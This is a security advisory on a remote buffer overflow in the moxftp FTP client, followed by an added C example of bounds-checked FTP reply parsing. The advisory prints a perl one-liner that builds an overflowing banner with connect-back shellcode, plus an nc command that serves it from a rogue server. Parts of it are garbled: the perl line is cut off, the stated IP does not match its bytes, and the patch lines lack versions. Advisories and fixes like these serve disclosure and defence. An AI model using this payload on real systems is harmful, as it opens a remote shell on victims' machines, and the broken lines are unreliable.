24th Feb 2003 [SBWID-6017]
moxftp remote overflow
moxftp-2.2 shipping with the FreeBSD ports system as well as from
various webpages per 9/2-03 is vulnerable.
From Knud Erik Højgaard's advisory:
According to the vendor moxftp is a "Ftp shell under X Window System".
Insufficient bounds checking leads to execution of arbitrary code.
Upon parsing the '220 welcome to server' ftp banner a buffer can be
overrun, allowing us to execute our arbitrary code. The buffer may be
constructed as such: [508 bytes][ebp ][eip ][nops][shellcode]. Placing
the nops and shellcode in the buffer before ebp seems to cause some
problems, luckily there's plenty of space after eip.
$ perl -e 'print "220 " . "\x90" x 508 . "\x48\xfa\xbf\xbf" x 2 . "\x90" x 100 .
x68\x2f\x62\x69\x6e\x89\xe3\x51\x54\x53\x53\xb0\x3b\xcd\x80" . "\n"' > file
# nc -l -p 21 < file
This sets up a rogue server which will overflow the buffer, and execute
the shellcode. The shellcode is connect-back to 126.96.36.199 port
10000, replace "\xd9\x9d\x02\x24" with a suitable ip for testing.
Upgrade to latest patched version.
For the stable distribution (woody) this problem has been fixed in
For the old stable distribution (potato) this problem has been fixed in
For the unstable distribution (sid) this problem has been fixed in
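A bounds-checked way for an FTP client to handle a reply line such as the 220 banner, as an added example (not moxftp's code and not part of the advisory). The function name, the result codes and the 512-byte buffer size are assumptions made for illustration.

```c
#include <ctype.h>
#include <stddef.h>
#include <string.h>

#define REPLY_TEXT_MAX 512  /* assumed size of the client's reply buffer */

/* Result codes (hypothetical names, not from moxftp). */
enum { REPLY_OK = 0, REPLY_MALFORMED = -1, REPLY_TOO_LONG = -2 };

/*
 * Parse one server reply line such as "220 welcome to server\r\n".
 * line/len: raw bytes as received from the socket (not NUL-terminated).
 * code:     receives the three-digit reply code on success.
 * text:     caller's buffer of text_sz bytes, NUL-terminated on success.
 * Overlong text is rejected rather than truncated, so the caller can
 * drop the connection to a server that sends an oversized banner.
 */
int parse_ftp_reply(const char *line, size_t len, int *code,
                    char *text, size_t text_sz)
{
    size_t i, text_len;

    /* Strip the trailing CRLF or bare LF. */
    while (len > 0 && (line[len - 1] == '\n' || line[len - 1] == '\r'))
        len--;

    /* Need "ddd" followed by ' ' (final line) or '-' (continuation). */
    if (len < 4 || text_sz == 0)
        return REPLY_MALFORMED;
    for (i = 0; i < 3; i++)
        if (!isdigit((unsigned char)line[i]))
            return REPLY_MALFORMED;
    if (line[3] != ' ' && line[3] != '-')
        return REPLY_MALFORMED;

    /* The length is checked before a single byte is copied. */
    text_len = len - 4;
    if (text_len >= text_sz)
        return REPLY_TOO_LONG;

    /* An embedded NUL would hide the rest of the text from string code. */
    if (memchr(line + 4, '\0', text_len) != NULL)
        return REPLY_MALFORMED;

    memcpy(text, line + 4, text_len);
    text[text_len] = '\0';
    *code = (line[0] - '0') * 100 + (line[1] - '0') * 10 + (line[2] - '0');
    return REPLY_OK;
}
```

A banner whose text does not fit the buffer returns REPLY_TOO_LONG and leaves the destination untouched, which is the check the advisory describes as missing.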